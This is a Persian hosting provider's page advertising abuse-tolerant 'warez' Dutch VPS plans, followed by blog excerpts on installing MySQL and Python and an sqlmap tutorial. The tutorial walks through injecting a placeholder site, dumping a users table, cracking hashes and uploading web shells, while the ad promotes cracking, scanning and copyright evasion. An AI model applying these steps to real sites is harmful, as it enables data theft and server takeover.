سرور مجازی هلند

سرور مجازی هلند

سرورهای مجازی ما در اروپا با قرارگیری در دیتاسنتر های قدرتمند هلند با آپتایم بالا و کیفیت فوق العاده آماده استفاده مشتریان گرامی می باشد.*این سرور مجازی وارز می باشند و تورنت ، کرک (اکانت) و اسکن (نرم افزار های nmap و zmap) در آنها آزاد است. لذا مشتریان گرامی میتوانند به راحتی از این امکانات استفاده کنند. با خرید سرور مجازی وارز هلند میتوانید از سرور مجازی کالی لینوکس نیز در این سرور ها استفاده کنید.

چرا خرید سرور مجازی وارز هلند:


با توجه به اینکه کشور هلند یکی از کشورهای نقض قانون کپی رایت در اروپا میباشد، به همین دلیل اکثر سرورهای این کشور به صورت وارز بوده و بدون پیگیری از جرائم قوانین بین المللی اقدام به ارائه سرور و پیگیریهای بعد از آن میباشند، این امر باعث شده تا اکثر کاربران استفاده از تورنت، اسکنر، کرکر و… از سرورهای چنین دیتاسنترهایی استفاده کنند.با خرید سرور مجازی وارز هلند وان سرور می توانید از این قابلیت ها بهره ببرید که بدون مشکل و اخطارهای دیتاسنتری از سرور خود استفاده کنید ( عملیاتی که باعث اختلال و هک در شبکه های دیتاسنتر شود از سمت دیتاسنتر و وان سرور به صورت جدی پیگیری و سرور مورد نظر حذف خواهد شد ). به علت محدودیت ترافیک این سرور برای سرورهای هاست دانلود بزرگ و پر بازدید مناسب نمیباشد. استفاده از کرکرهایی که پورت سرور را اشغال میکنند در صورت خرید پهنای باند اضافی امکان استفاده از سرور را خواهند داشت.

تخفیف 50 درصدی سرور مجازی

پلن های سرور مجازی وارز هلند

مشخصات HKVM-1 HKVM-2 HKVM-3 HKVM-4 HKVM-5
CPU/پردازنده 500Mhz-1V 1Ghz-2V 1.5Ghz-2V 2Ghz-3V 2.5Ghz-3V
RAM/حافظه 512M 1024M 2048M 3072M 4096M
HDD/هارد دیسک 15G 20G 30G 40G 50G
نوع هارد دیسک SSD SSD SSD SSD SSD
نوع مجازی ساز KVM KVM KVM KVM KVM
Port/پورت 100Mbps 1Gbps 1Gbps 1Gbps 1Gbps
BW/ترافیک Unlimited/منصفانه Unlimited/منصفانه Unlimited/منصفانه Unlimited/منصفانه Unlimited/منصفانه
DC/دیتاسنتر ecatel-Holland ecatel-Holland ecatel-Holland ecatel-Holland ecatel-Holland
OS/سیستم عامل Free OS Free OS Free OS Free OS Free OS
زمان تحویل 5-30 Minutes 5-30 Minutes 5-30 Minutes 5-30 Minutes 5-30 Minutes
نوع آی پی IPv4/IPv6 IPv4/IPv6 IPv4/IPv6 IPv4/IPv6 IPv4/IPv6
آپ تایم %99.99 %99.99 %99.99 %99.99 %99.99
پشتیبانی
گارانتی بازگشت وجه
ماهیانه/تومان 302,250 453,700 604,500 755,950 906,750
سه ماهه/ تومان 906,750 1,326,000 1,662,700 2,191,800 ----
شش ماهه/تومان 1,787,500 2,619,500 3,476,850 4,081,350 ----
سالیانه/تومان 3,510,000 ---- ---- ---- ----
  سفارش سفارش سفارش سفارش سفارش

پلــن مورد نظرتـــان را نیــافتید؟!

همین حالا پلن انتخابی یا کانفیگ اختصاصیتان را درخواست کنید

پشتیبانی 24/7

وان سرور با تیمی قدرتمند پشتیبانی 24 ساعته در هفت روز هفته را برای کاربران گرامی وان سرور تدارک دیده تا در هر زمان افتخار خدمت رسانی داشته باشد. پشتیبانی از طریق تیکت و تماس.

آپتایم 99.99%

سرورهای وان سرور از معتبرترین دیتاسنترهای جهان که دارای تضمین آپ تایم 99.99% میباشند، تیم وان سرور به صورت 24 ساعته در حال مانیتورینگ سرورها هستند تا در صورت وجود هرگونه اختلال و مشکل سریعا پیگیر حل مشکل باشند.

مجازی ساز KVM

میزبانی سرورهای مجازی در کنترل پنل Virtualizor امکان دسترسی مدیریتی بهتر با قابلیت نصب و مدیریت سیستم عامل را به شما میدهد که مناسب افرادی با کاربردهای آموزشی میباشد.

پشتیبانی ویندوز سرور

این سرورها قابلیت نصب سیستم عامل ویندوز سرور را دارا هستند که در حین سفارش سرویس در گزینه سیستم عامل نوع ویندوز را انتخاب کنید. حداقل منابع برای نصب ویندوز رم 1 گیگ میباشد.

شبکه وارز

سیاستهای این دیتاسنتر به نوعی میباشد که به صورت نیمه وارز بوده و مناسب تست های نفوذ است،که برای موارد تست باعث ارسال ابیوز نخواهد شد.

IPv4 & IPv6

این سرورهای مجازی دارای یک ipv4 و یک ipv6 هستند، همچنین امکان اضافه نمودن آی پی نسل جدید از نوع ipv6 مقدور میباشد.

برخی از سیستم عامل های قابل پشتیبانی

سوالات متداول

برخی از سوالاتی که ممکن است در ابتدا داشته باشید

بله، دسترسی کامل به پنل مدیریت سرور از جمله (روشن خاموش، ریستارت، نصب سیستم عامل، vnc ، مانیتورینگ سرور و ...) دارید. امکان نصب هر نوع سیستم عامل از iso از سمت پشتیبانی ممکن است، برای نصب حتما با پشتیبان وان سرور در ارتباط باشید.

همچنین امکان تعیین iso و نصب سیستم عاملهای آماده از سمت خود شما بدون نیاز به پشتیبانی محیاست.

منابع سخت افزاری گفته شده در هر پلن کاملا اختصاصی در اختیار کاربران قرار میگیرد، پورت سرور نیز بدون هیچ محدودیت ترافیکی و پهنای باند فعال میباشد.

خیر، وان سرور همانند اکثریت سایتهای میزبانی در سرورهای مجازی خود بک آپ گیری ندارد، اگر نیاز به سروری با قابلیت بک آپ گیری دارید سرورهای مجازی انگلیس و فرانسه دارای این قابلیت هستند.

بله، فقط امکان ارتقای پلن در صورت موجود بودن در هر بازه زمانی ممکن است و محاسبه هزینه ارتقا بر اساس زمان مانده و تفاوت قیمت دو پلن میباشد . تنزل سرویس هم فقط در  زمان سررسید ممکن هست که دراین خصوص میتوانید از طریق تیکت درخواستتون رو به پشتیبانی ارسال کنید.

بله، مجازی ساز این سرورها از نوع KVM بوده و در مشخصات سرویس تمامی دسترسی ها از قبلی: 1- کنسول vnc سرور 2- تعیین بوت 3- تنظیم ایزو برای بوت 4- ریلود و نصب مجدد سیستم عامل 5- مانیتورینگ کامل 6- ریست خاموش و روشن و… مقدور است.

به دلیل وارز بودن سرورهای هلند ترافیک سرور اختصاصی محدود میباشد و برای مدیریت بهتر و راحتی کاربران از هزینه های مازاد این پلنها به صورت ترافیک نامحدود منصفانه ارائه میشود تا بدون مشکل محدودیت ترافیکی از سرورها استفاده کنید، اما روند این محدودیتها به شکل زیر در هر پلن میباشد:

پلن HKVM-1 : پورت این سرور 100Mbps و بدون محدودیت ترافیکی میباشد.

پلن HKVM-2 : پورت این سرور 1Gbps تا مصرف ترافیک 20 ترابایت ماهانه میباشد، پس از اتمام این ترافیک اضافه پیش از اتمام ماه پورت سرور به 100Mbps تغییر داده خواهد شد.(اگر نیاز به پورت 1گیگ بیشتر از مصرف این ترافیک در ماه هستید باید ترافیک مازاد خریداری کنید که هرترابایت اضافه 1 یورو محاسبه میشود)

پلن HKVM-3 : پورت این سرور 1Gbps تا مصرف ترافیک 25 ترابایت ماهانه میباشد، پس از اتمام این ترافیک اضافه پیش از اتمام ماه پورت سرور به 100Mbps تغییر داده خواهد شد.(اگر نیاز به پورت 1گیگ بیشتر از مصرف این ترافیک در ماه هستید باید ترافیک مازاد خریداری کنید که هرترابایت اضافه 1 یورو محاسبه میشود)

پلن HKVM-4 : پورت این سرور 1Gbps تا مصرف ترافیک 30 ترابایت ماهانه میباشد، پس از اتمام این ترافیک اضافه پیش از اتمام ماه پورت سرور به 100Mbps تغییر داده خواهد شد.(اگر نیاز به پورت 1گیگ بیشتر از مصرف این ترافیک در ماه هستید باید ترافیک مازاد خریداری کنید که هرترابایت اضافه 1 یورو محاسبه میشود)

پلن HKVM-5 : پورت این سرور 1Gbps تا مصرف ترافیک 35 ترابایت ماهانه میباشد، پس از اتمام این ترافیک اضافه پیش از اتمام ماه پورت سرور به 100Mbps تغییر داده خواهد شد.(اگر نیاز به پورت 1گیگ بیشتر از مصرف این ترافیک در ماه هستید باید ترافیک مازاد خریداری کنید که هرترابایت اضافه 1 یورو محاسبه میشود)

دیتاسنتر این نوع سرورهای مجازی هلند حساسیت بالایی به ابیوز ها ندارند. منظور از ابیوز اخطار هایی که از سمت دیتاسنتر و خارج از دیتاسنتر به کاربری که آی پی در اختیار آن هست ارسال میشود که قوانین کپی رایت یا دیتاسنتر را نقض کرده باشد. از این رو این دیتاسنتر نسبت به دیگر دیتاسنترها حساسیت کمتری دارد که میتوان از گزینه های مثبت این نوع سرور مجازی هلند وان سرور اشاره کرد.

این نوع سرور مناسب کاربرهایی که در حوزه شبکه و تست نفوذ و امنیت آموزش یا فعالیت میکنند مناسب میباشد. همچنین در استفاده شبکه تورنت این نوع سرورها گزینه ی مناسبی میباشند.

اگر جواب سوالتان را نیافتید، میتوانید از لینک زیر در بخش تماس با ما از طریق پلهای ارتباطی با ما در ارتباط باشید.

صفحه تماس بـــا مـــا

نظرات مشتریان

برخی از نظرات مشتریان وان سرور

جزیره آموزشی

برخی از پستهای آموزشی پیشنهادی
آموزش نصب MySQL در CentOS 8

آموزش نصب MySQL در CentOS 8

آموزش نصب MySQL در CentOS 8MySQL محبوب ترین سیستم مدیریت منبع باز پایگاه داده رابطه ای است. در این آموزش نحوه نصب و ایمن سازی MySQL 8.0 در سیستم های CentOS 8 به شما نشان خواهیم داد. آخرین نسخه سرور پایگاه داده MySQL ، نسخه 8.0 ، از مخازن پیش فرض CentOS 8 برای نصب در دسترس است. MySQL 8.0 بسیاری از ویژگی ها و تغییرات جدید را معرفی کرد که برخی از برنامه ها را با این نسخه ناسازگار می کند. قبل از انتخاب نسخه MySQL برای نصب ، اسناد برنامه ای که می خواهید در سرور CentOS خود نصب کنید ، مشاهده کنید. CentOS 8 همچنین MariaDB 10.3 را ارائه می دهد ، که برای "MySQL 5.7" جایگزینی قابل حذف است. اگر برنامه شما با MySQL 8.0 سازگار نیست ، MariaDB 10.3 را نصب کنید. نصب MySQL 8.0 در CentOS 8 سرور MySQL 8.0 را با استفاده از مدیر بسته CentOS به عنوان root یا کاربر دارای امتیازات sudo نصب کنید : sudo dnf install @mysqlماژول @mysql برای شما MySQL و تمام وابستگی ها را نصب می کند. پس از اتمام نصب ، سرویس MySQL را استارت کرده و با اجرای دستور زیر ، آن را فعال کنید تا بطور خودکار بعد از بوت فعال شود: sudo systemctl enable --now mysqld برای بررسی اینکه سرور MySQL در حال کار است ، تایپ کنید:sudo systemctl status mysqld● mysqld.service - MySQL 8.0 database server Loaded: loaded (/usr/lib/systemd/system/mysqld.service; enabled; vendor preset: disabled) Active: active (running) since Thu 2019-10-17 22:09:39 UTC; 15s ago ...آیا میدانستید سرعت هارد نقش مهمی در سرعت MySQL دارد؟با سرورهای مجازی وان سرور با هارد جدید و پرسرعت NVme به جمع حرفه ای ها بپیوندید.امنیت MySQL اسکریپت mysql_secure_installation را اجرا کنید که چندین عملیات امنیتی را انجام می دهد و رمز روت MySQL را تنظیم می کند: sudo mysql_secure_installation از شما خواسته می شود تا VALIDATE PASSWORD PLUGIN ، که برای تست قدرت رمزهای عبور کاربران MySQL و بهبود امنیت استفاده می شود را کانفیگ کنید. سه سطح سیاست اعتبار سنجی گذرواژه ، کم ، متوسط ​​و قوی وجود دارد. اگر نمی خواهید افزونه رمز عبور معتبر را تنظیم کنید ، ENTER را فشار دهید.در صورت درخواست بعدی، از شما خواسته می شود که یک رمز عبور برای کاربر روت MySQL تنظیم کنید.پس از انجام این کار اسکریپت همچنین از شما می خواهد تا کاربر ناشناس را حذف کنید.دسترسی کاربر root به دستگاه محلی را محدود کرده و پایگاه داده آزمایشی را حذف کنید. شما باید به همه سؤالات "بله" (بله) پاسخ دهید. برای تعامل با سرور MySQL از خط فرمان، از ابزار سرویس دهنده MySQL که به عنوان یک وابستگی نصب شده است استفاده کنید. دسترسی روت را با تایپ کردن دستور زیر تست کنید:mysql -u root -p در صورت درخواست رمزعبور اصلی را وارد کنید و مطابق زیر پوسته MySQL به شما ارائه می شود: خروجی:Welcome to the MySQL monitor. Commands end with ; or \g.Your MySQL connection id is 12Server version: 8.0.17 Source distributionشما MySQL 8.0 را بر روی سرور CentOS خود نصب و امن کرده اید و آماده استفاده از آن هستید.روش احراز هویت سرور MySQL 8.0 که در مخازن CentOS 8 موجود است ، قرار است از افزونه احراز هویت قدیمی mysql_native_password استفاده کند ، زیرا برخی از ابزارها و کتابخانه های مشتری در CentOS 8 با روش caching_sha2_password سازگار است، که در نسخه بالادست MySQL 8.0 به صورت پیش فرض تنظیم شده است. روش mysql_native_password برای اکثر تنظیمات باید خوب باشد. اما اگر می خواهید افزونه تأیید اعتبار پیش فرض را به caching_sha2_password که سریعتر است و امنیت بهتری ارائه می دهد ، تغییر دهید ، پرونده پیکربندی زیر را باز کنید: sudo vim /etc/my.cnf.d/mysql-default-authentication-plugin.cnfمقدار default_authentication_plugin را به caching_sha2_password تغییر دهید:[mysqld]default_authentication_plugin=caching_sha2_passwordپرونده را ببندید و ذخیره کنید ، و سرور MySQL را مجدداً راه اندازی کنید تا تغییرات اعمال شود: sudo systemctl restart mysqldنتیجه CentOS 8 با MySQL 8.0 توزیع می شود. نصب به سادگی با تایپ کردن dnf install @mysql انجام میشود. اکنون که سرور MySQL شما فعال است. می توانید به پوسته MySQL وصل شوید و ایجاد پایگاه های داده جدید و کاربران را آغاز کنید .

دوشنبه, 29 مهر 1398

ادامه مطلب
آموزش نصب پایتون 3.9 در اوبونتو 20.04 Ubuntu

آموزش نصب پایتون 3.9 در اوبونتو 20.04 Ubuntu

آموزش نصب پایتون 3.9 در اوبونتو 20.04 Ubuntuزبان پایتون یکی از محبوب ترین زبان های برنامه نویسی جهان است. این یک زبان همه کاره است که برای ساخت انواع برنامه ها ، از اسکریپت های ساده گرفته تا الگوریتم های پیچیده یادگیری ماشین استفاده می شود. پایتون با نحوی ساده و آسان برای یادگیری ، گزینه ای محبوب برای مبتدیان و توسعه دهندگان باتجربه است. در این مقاله آموزش نصب پایتون 3.9 در اوبونتو 20.04 Ubuntu را به شما آموزش خواهیم داد.Python 3.9 آخرین نسخه اصلی انتشار زبان Python است. این شامل بسیاری از ویژگی های جدید مانند اپراتورهای جدید جدید ، توابع جدید str ، پشتیبانی از منطقه زمانی IANA و موارد دیگر است .پایتون 3.9 در مخازن استاندارد اوبونتو 20.04 موجود نیست.در این مقاله ، ما دو روش برای نصب پایتون 3.9 در اوبونتو 20.04 به شما نشان خواهیم داد. اولین گزینه نصب بسته از deadsnakes PPA است و گزینه دوم ساخت پایتون 3.9 از کد منبع است.مراحل مشابهی برای اوبونتو 18.04 و همه توزیع های مبتنی بر اوبونتو از جمله Kubuntu ، Linux Mint و Elementary OS اعمال می شود.نصب پایتون 3.9 در اوبونتو با Aptنصب پایتون 3.9 در اوبونتو با apt یک روند نسبتاً ساده است و انجام آن فقط چند دقیقه طول می کشد.لیست بسته ها را به روز کنید و پیش نیازها را نصب کنید:sudo apt updatesudo apt install software-properties-commondeadsnakes PPA را به لیست منابع سیستم خود اضافه کنید:sudo add-apt-repository ppa:deadsnakes/ppaوقتی از شما خواسته شد ، [Enter]برای ادامه فشار دهید .پس از فعال شدن مخزن ، می توانید با اجرای Python 3.9 نصب کنید:sudo apt install python3.9با تایپ کردن تأیید کنید که نصب با موفقیت انجام شده است:python3.9 --versionخروجی:Python 3.9.0+Python 3.9 روی اوبونتو نصب شده است و می توانید از آن استفاده کنید.نصب پایتون 3.9 در اوبونتو 20.04 از منبعکامپایل پایتون از منبع به شما امکان می دهد جدیدترین نسخه پایتون را نصب کرده و گزینه های ساخت را شخصی سازی کنید. با این حال ، شما نمی توانید نصب Python خود را از طریق apt حفظ کنید .مراحل زیر نحوه تدوین پایتون 3.9 از منبع را توضیح می دهد:وابستگی های لازم برای ساخت پایتون را نصب کنید:sudo apt updatesudo apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget libbz2-devکد منبع آخرین نسخه را از صفحه بارگیری پایتون بارگیری کنید:wget https://www.python.org/ftp/python/3.9.0/Python-3.9.0.tgzپس از اتمام بارگیری ، بایگانی gzipped را استخراج کنید :tar -xf Python-3.9.0.tgzسوئیچ را به دایرکتوری منبع پایتون و اجرای اسکریپت configure، که به انجام تعدادی از چک کنید تا مطمئن شوید همه از وابستگی بر روی سیستم شما وجود دارد:cd Python-3.9.0./configure --enable-optimizationsگزینه --enable-optimizations با اجرای چندین آزمایش باینری پایتون را بهینه می کند. این روند ساخت را کندتر می کند.روند ساخت Python 3.9 را شروع کنید:make -j 12برای زمان ساخت سریعتر ، -jمتناسب با تعداد هسته پردازنده خود را اصلاح کنید. با تایپ کردن nproc می توانید تعداد هسته را پیدا کنید .وقتی مراحل ساخت کامل شد ، باینرهای پایتون را با تایپ کردن دستور زیر نصب کنید:sudo make altinstallما از altinstall بجای tinstall استفاده می کنیم زیرا بعداً سیستم پیش فرض python3 binary را بازنویسی می کند. Python 3.9 نصب شده و آماده استفاده است. برای تأیید آن ، تایپ کنید:python3.9 --versionخروجی:Python 3.9.0+نتیجهما به شما آموزش نصب پایتون 3.9 در اوبونتو 20.04 Ubuntu را نشان داده ایم. اکنون می توانید توسعه پروژه Python 3.9 خود را شروع کنید.در مرحله بعدی ، می توانید در مورد نحوه استفاده از Pip را مطالعه کنید.

دوشنبه, 26 آبان 1399

ادامه مطلب
SQLmap چیست و آموزش استفاده از SQLmap

SQLmap چیست و آموزش استفاده از SQLmap

SQLmap چیست؟Sqlmap یکی از مشهورترین و قوی ترین ابزار خودکار sql injection ای هست که در بحث امنیت وجود دارد . با وجود یک آدرس اینترنتی آلوده sqlmap میتواند از پایگاه داده آن به طرق مختلف بهره برداری و سوء استفاده کند و بسیاری از هکینگ های مختلف نظیر خارج کردن نام ها و جداول و ستون ها و همچنین تمامی اطلاعات درون جداول را انجام دهد! در این آموزش آموزش استفاده از sqlmap برای بهره برداری از نرم افزار های تحت وب آسیب پذیر و همچنین تمامی کار هایی که با این نرم افزار میتوان انجام داد را بررسی میکنیم .این بزار حتی میتواند در شرایطی خاص فایل ها را به صورت ریموت و یا از راه دور  بخواند و بنویسد همچنین توسط زبان برنامه نویسی پایتون نوشته شده است . این ابزار یکی از قویترین ابزار هکینگ موجود است . sqlmap قابل استفاده برای sql injection است .Sqlmap در ابزار های تست نسخه هایی از لینوکس مانند کالی لینوکس و بک ترک و بک باکس و... گنجانده شده است . در نسخه های دیگر میتوان به سادگی از لینک زیر آن را نصب کردhttp://sqlmap.org/از آنجا که این برنامه با پایتون نوشته شده است . ابتدا ما باید بر روی سیستم مان پایتون را نصب کنیم .برای درک بهتر این این آموزش ما باید دانش نسبی ای درباره چگونگی پایگاه های داده ای که با نرم افزار های تحت وب کار می کنند داشته باشیم . برای مثال آنهایی که با php و mysql ساخته شده اند.آدرس های آسیب پذیر :خب فرض کنیم که یک نرم افزار تحت وب یا وبسایت آدرس اینترنتی ای مانند آدرس زیر دارد :http://www.site.com/section.php?id=51و این آدرس مستعد sql injection است زیرا برنامه نویس این سایت به درستی از پارامتر id استفاده نکرده است. این کار را می توان با تلاش برای باز کردن آدرس اینترنتی به راحتی آزمایش کرد. 'http://www.site.com/section.php?id=51ما فقط یک نقل قول (') را به پارامتر اضافه کردیم . اگر این آدرس به شیوه ای غیره منتظره واکنشی نشان دهد سپس واضح است که این واکنش غیر منتظره به نقل قول به معنی آن است که به راحتی نمیتواند عبور کند . بنابراین در این نمونه پارامتر id در برابر sql injection آسیب پذیر است .آموزش استفاده از sqlmapالان زمان این رسیده است که برای هک کردن چنین آدرس هایی به سراغ sqlmap برویم . sqlmap توسط ترمینال همراه با مترجم پایتون اجرا میشود .1-اسکن کردن سیستم به صورت ریموتاولین دستوری که سیستم را به صورت ریموت از لحاظ آسیب پذیری sql injection بررسی کرده و در باره آن اطلاعاتی جمع آوری میکند، دستو زیر است:$ python sqlmap.py -u "http://www.site.com/section.php?id=51"در بالا اولین و مهمترین دستور برای اجرا در برنامه sqlmap ذکر شده است. این دستور پارامتر های درونی را برای این که به sql injection آسیب پذیر هستند یا نه چک میکند . برای این sqlmap  انواع مختلفی از نمونه های پیلود های sql injection را به پارامتر ورودی ارسال کرده و در نهایت خروجی را بررسی میکند .در این فرایند sqlmap همچنین قادر است تا به صورت ریموت سیستم عامل سیستم، نام دیتابیس و نسخه آن را شناسایی کند . در اینجا نمونه ای از خروجی فرضی را می توان مشاهده نمود .[*] starting at 12:10:33[12:10:33] [INFO] resuming back-end DBMS 'mysql'[12:10:34] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---[12:10:37] [INFO] the back-end DBMS is MySQLweb server operating system: FreeBSDweb application technology: Apache 2.2.22back-end DBMS: MySQL 5خب ابزار sqlmap سیستم عامل، وب سرور و دیتابیس را به همراه نسخه آن کشف کرده است. هرچند این مسئله هم خیلی چشمگیر و موثر است اما زمان این است که شروع کنیم تا توانایی های بیشتر این ابزار را ببینیم .2- کشف کردن پایگاه های داده :زمانی که sqlmap تایید کرد که آدرس اینترنتی در برابر sql injection آسیب پذیر است، قدم بعدی پیدا کردن نام های دیتابیس (پایگاه داده) از طریق ریموت سیستم قابل استفاده است .  گزینه  "—dbs" برای به دست آوردن لیست پایگاه داده استفاده می شود .$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbsخروجی می تواند یه چیزی شبیه به مثال زیر باشد :[*] starting at 12:12:56[12:12:56] [INFO] resuming back-end DBMS 'mysql'[12:12:57] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---[12:13:00] [INFO] the back-end DBMS is MySQLweb server operating system: FreeBSDweb application technology: Apache 2.2.22back-end DBMS: MySQL 5[12:13:00] [INFO] fetching database names[12:13:00] [INFO] the SQL query used returns 2 entries[12:13:00] [INFO] resumed: information_schema[12:13:00] [INFO] resumed: safecosmeticsavailable databases [2]:[*] information_schema[*] safecosmeticsخروجی نام پایگاه های داده موجود را بر روی ریموت سیستم نشان می دهد .3- پیدا کردن جداول در پایگاه داده خاصالان وقت آن رسیده است که جداول موجود در یک دیتابیس خاص راپیدا کنیم . خب ما در نظر میگیریم دیتابیس مورد علاقه ما در اینجا  'safecosmetics' است .دستور :$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmeticsو خروجی میتواند یه چیزی شبیه به این باشد :[11:55:18] [INFO] the back-end DBMS is MySQLweb server operating system: FreeBSDweb application technology: Apache 2.2.22back-end DBMS: MySQL 5[11:55:18] [INFO] fetching tables for database: 'safecosmetics'[11:55:19] [INFO] heuristics detected web page charset 'ascii'[11:55:19] [INFO] the SQL query used returns 216 entries[11:55:20] [INFO] retrieved: acl_acl[11:55:21] [INFO] retrieved: acl_acl_sections........... more tablesحال با هم ستون های یک جدول خاص را پیدا می کنیم :4-پیدا کردن ستون های خاص یک جدول :حال که ما لیست جداول را داریم . ایده خوبیست که ستون های بعضی از جداول خاص را به دست بیاوریم . بیایید فرض کنیم جدول "users" است و این شامل نام کاربر و پسورد است .$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T usersخروجی یه چیزی شبیه به زیر است :[12:17:39] [INFO] the back-end DBMS is MySQLweb server operating system: FreeBSDweb application technology: Apache 2.2.22back-end DBMS: MySQL 5[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'[12:17:41] [INFO] heuristics detected web page charset 'ascii'[12:17:41] [INFO] the SQL query used returns 8 entries[12:17:42] [INFO] retrieved: id[12:17:43] [INFO] retrieved: int(11)[12:17:45] [INFO] retrieved: name[12:17:46] [INFO] retrieved: text[12:17:47] [INFO] retrieved: password[12:17:48] [INFO] retrieved: text.......[12:17:59] [INFO] retrieved: hash[12:18:01] [INFO] retrieved: varchar(128)Database: safecosmeticsTable: users[8 columns]+-------------------+--------------+| Column | Type |+-------------------+--------------+| email | text || hash | varchar(128) || id | int(11) || name | text || password | text || permission | tinyint(4) || system_allow_only | text || system_home | text |+-------------------+--------------+خب ستون ها به وضوح قابل رویت هستند .5- به دست آوردن داده از یک جدولاکنون به جالب ترین بخش رسیدیم . استخراج داده (اطلاعات) از جدول . دستور مطابق زیر است :$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T usersدستور بالا به سادگی داده (دیتا) را از جدول خاص بیرون میکشد خیلی شبیه به دستور mysqldump است .خروجی چیزی شبیه به زیر است :+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+| id | hash | name | email | password | permission | system_home | system_allow_only |+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+| 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank> |+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+به نظر میرسد که ستون hash حاوی پسورد به صورت رمز نگاری است . سعی کنید تا هش را کرک کرده و سپس مسقیما ورود پیدا کنید . sqlmap یک فایل با پسوند csv از دیتای خروجی می سازد تا به راحتی مورد بررسی قرار بگیرد .خب تا اینجا ما به کمک sqlmap توانستیم اطلاعات زیادی را به صورت ریموت از دیتابیس یا پایگاه داده جمع آوری کنیم . مانند این است که کاربر دسترسی مستقیم به دیتابیس از طریق phpmyadmin داشته باشد. در سناریوی واقعی هکر باید تلاش بیشتری کند تا دسترسی بالاتری به سیستم داشته باشد . برای این آنها باید تلاش کنند تا پسورد رمزنگاری شده را دکیریپت یا رمزشکنی کنند و تلاش کنند تا به پنل ادمین یا مدیر لاگین (ورود) کنند . یا آنها سعی کنند با استفاده از sqlmap  به سیستم عامل دسترسی پیدا کنند .قدم بعدی چیست ؟هنگامی که ما قادر هستیم اسکن کرده یا از سیستم آسیب پذیر اطلاعات جمع آوری کنیم زمان آن فرا رسیده است که از آن بهره برداری کنیم و ببینیم که امکان آن وجود دارد که به آن سیستم دسترسی داشته باشیم . sqlmap قادر است که کار های کوچکی مانند اجرای کوئری های sql را بر روی ریموت سیستم انجام داده یا بر روی سیستم یک ریموت شل راه اندازی کند .اجرای کوئری های sql به صورت دلخواه :احتمالا ساده ترین کاری که میتوان بر روی سرور انجام داد این است که حمله از طریق sql injection باشد . پارامتر کوئری (نمایش) –sql  میتواند برای اجرای یک کوئری خاص استفاده شود .نکته ی شگفت انگیز ماجرا این است که قادر خواهیم بود یک کاربر یا یوزر را در جدول کاربران ایجاد کنیم یا کار هایی از این قبیل یا شاید محتوای صفحه مدریت محتوا (cms) را تغییر بدهیم .وارد صفحه ی پنل مدیریت شده و شروع کنید :اگر وبسایت مورد نظر توسط یک سری از cms های خاص یا در کل صفحه ی پنل مدیریت دار اجرایی مشود پس از طریق صفحه ی ارائه شده برای بازیابی پسورد با بازیابی یا کرک پسورد در دیتابیس ممکن است بتوان وارد شد . پسورد های ساده یا کوتاه را میتوان با برت فورس شکست یا از گوگل کمک گرفت .چک کنید که صفحه ی مدیریت اجازه میدهد تا چند فایل را آپلود کنید. اگر یک فایل php دلخواه را بشود آپلود کرد قضیه خیلی جالب تر خواهد بود . فایل php می تواند یک شل یا سیستم کنترل از راه دوری باشد که بتوان به صورت ریموت دستورات را اجرا کرد . و یا میتوان وب شل هایی رو آپلود کرد تا مستقیما همین کار را انجام داد .شل های از راه دور :این کاری است که برای به دست گرفتن کل سیستم میتوان انجام داد . با این حال توجه داشته باشید که مانند کار هایی که بالا نشان داده شد آسان نیست .sqlmap میتواند با با پارامتری که به آن  --os-shel گفته میشود برای به دست گرفتن یک شل در ریموت سیستم استفاده شود . اما این قضیه به طور زیادی با محدودیت همراه است .با توجه به راهنمای sqlmap :It is possible to run arbitrary commands on the database server's underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.مهمترین امتیاز مورد نیاز در کاربر دیتابیس موجود نوشتن یا برگذاری فایل ها در درون کارکرد های پایگاه داده یا دیتابیس است . که این مورد در اکثر موارد غایب است و در حالت تکنیکی در بیشتر مواقع کار نخواهد کرد .توجه داشته باشید :بعضی مواقع sqlmap در کل نمیتواند به آدرس مورد نظر وصل شود .این مورد زمانی مشاهده می شود که در اولین اتصال گیر کند و پیام " آزمایش ارتباط اتصال با آدرس هدف" را بدهد . در این موارد استفاده از گزینه ی "—random-agent" کارامد خواهد بود . این باعث می شود که sqlmap با اثر یکی از نماینده کاربر معتبری همچون مرورگر کروم یا فایر فاکس ارسال کند .  برای آدرس هایی که در پارامتر معتبری نیستند sqlmap نمیداند که Inject را از چه طریقی انجام بدهد . برای مثال آدرس هایی مانند  :http://www.site.com/class_name/method/43/80در این موارد نیاز داریم تا با استفده از * اینجکشن را مشخص کنیمhttp://www.site.com/class_name/method/43*/80در بالا به sqlmap میگوییم که نقطه مورد نظر ما با * مشخص شده است .نتیجه گیریدر این آموزش با sqlmap و برخی استفاده های آن آشنا شدیم. در آموزش بعد نحوه استفاده از sqlmap برای فرم ها را شرح خواهیم داد.

چهارشنبه, 05 شهریور 1399

ادامه مطلب